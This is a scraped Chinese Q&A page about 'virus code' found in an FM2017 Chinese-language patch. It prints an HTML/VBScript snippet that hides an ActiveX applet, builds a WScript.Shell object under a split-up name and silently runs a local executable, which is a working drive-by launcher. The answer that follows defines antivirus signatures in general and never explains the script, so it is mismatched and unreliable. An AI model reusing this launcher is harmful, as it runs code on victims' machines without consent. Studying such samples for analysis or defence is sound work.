fm2017汉化补丁:病毒代码什么意思?

来源:百度文库 编辑:杭州交通信息网 时间:2024/05/14 16:20:41
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
</head>
<body style="margin: 0" scroll=no>
<object id=FileList border=0 tabindex=1
classid = "clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"
style="width: 100%; height: 100%" tabIndex=-1>
</object>
</body>
</html>
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><APPLET NAME=L HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div>"
</script>
<script language=vbscript>
On Error Resume Next
Dim path
Path = ""
Path = Left(document.location, Len(document.location) - 11)
Path = Mid(Path, 9)+"/"
Set AppleObject = document.applets("l")
AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
sd="w"+"sshe"+"ll"
Set sd = AppleObject.GetObject()
sd.run(Path + "MeetingNote.exe")
</script>

所谓的病毒代码其实可以想像成是犯人的指纹, 当防毒软件公司收集到一只新的病毒时, 他们就会从这个病毒程序中截取一小段独一无二而且足以表示这只病毒的二进位程序码 (Binary Code) , 来当做杀毒程序辨认此病毒的依据, 而这段独一无二的二进位程序码就是所谓的病毒代码.